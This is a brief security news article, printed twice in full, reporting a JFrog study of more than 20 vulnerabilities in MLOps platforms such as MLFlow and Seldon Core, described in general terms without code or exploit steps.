Researchers have found more than 20 weaknesses in machine learning platforms.
Cybersecurity researchers warn of significant risks associated with vulnerabilities in the machine learning (ML) software supply chain. For example, more than 20 vulnerabilities have recently been identified in a number of MLOps platforms that can be used to execute arbitrary code or download malicious datasets.
MLOps frameworks provide the ability to design and execute machine learning model pipelines, storing models in a repository for further use in applications or exposing them through APIs. However, some features of these technologies make them vulnerable to attack.
In their report, researchers from JFrog point to the presence of vulnerabilities caused by both the main formats and processes, as well as implementation errors. For example, attackers can use support for automatic code execution when loading models, such as Pickle files, which opens up new attack paths.
The danger also lies in the use of popular development environments, such as JupyterLab, which allows you to execute code and output results interactively. The problem is that the result of code execution may include HTML and JavaScript that will be automatically executed by the browser, creating a potential vulnerability to cross-site scripting (XSS) attacks.
One example of such a vulnerability was found in MLFlow, where insufficient data filtering leads to the execution of client code in JupyterLab, creating a security risk.
The second type of vulnerability is related to implementation flaws, such as lack of authentication on MLOps platforms, which allows attackers with network access to gain code execution capabilities using ML Pipeline features. Such attacks are not theoretical — they have already been used in real malicious operations, for example, when deploying cryptocurrency miners on vulnerable platforms.
Another vulnerability concerns container traversal in Seldon Core, which allows attackers to go beyond code execution and spread within the cloud environment, gaining access to other users' models and data.
All of these vulnerabilities can be exploited to penetrate and spread within an organization, as well as compromise servers. The researchers emphasize that it is important to isolate and protect the environment in which the models run to prevent arbitrary code from being executed.
JFrog's report comes on the heels of recent cases of vulnerabilities in other open-source tools, such as LangChain and Ask Astro, that could lead to data breaches and other security threats.
Attacks on supply chains in the field of artificial intelligence and machine learning have recently become more sophisticated and difficult to detect, which creates new challenges for cybersecurity professionals.
Source
Cybersecurity researchers warn of significant risks associated with vulnerabilities in the machine learning (ML) software supply chain. For example, more than 20 vulnerabilities have recently been identified in a number of MLOps platforms that can be used to execute arbitrary code or download malicious datasets.
MLOps frameworks provide the ability to design and execute machine learning model pipelines, storing models in a repository for further use in applications or exposing them through APIs. However, some features of these technologies make them vulnerable to attack.
In their report, researchers from JFrog point to the presence of vulnerabilities caused by both the main formats and processes, as well as implementation errors. For example, attackers can use support for automatic code execution when loading models, such as Pickle files, which opens up new attack paths.
The danger also lies in the use of popular development environments, such as JupyterLab, which allows you to execute code and output results interactively. The problem is that the result of code execution may include HTML and JavaScript that will be automatically executed by the browser, creating a potential vulnerability to cross-site scripting (XSS) attacks.
One example of such a vulnerability was found in MLFlow, where insufficient data filtering leads to the execution of client code in JupyterLab, creating a security risk.
The second type of vulnerability is related to implementation flaws, such as lack of authentication on MLOps platforms, which allows attackers with network access to gain code execution capabilities using ML Pipeline features. Such attacks are not theoretical — they have already been used in real malicious operations, for example, when deploying cryptocurrency miners on vulnerable platforms.
Another vulnerability concerns container traversal in Seldon Core, which allows attackers to go beyond code execution and spread within the cloud environment, gaining access to other users' models and data.
All of these vulnerabilities can be exploited to penetrate and spread within an organization, as well as compromise servers. The researchers emphasize that it is important to isolate and protect the environment in which the models run to prevent arbitrary code from being executed.
JFrog's report comes on the heels of recent cases of vulnerabilities in other open-source tools, such as LangChain and Ask Astro, that could lead to data breaches and other security threats.
Attacks on supply chains in the field of artificial intelligence and machine learning have recently become more sophisticated and difficult to detect, which creates new challenges for cybersecurity professionals.
Source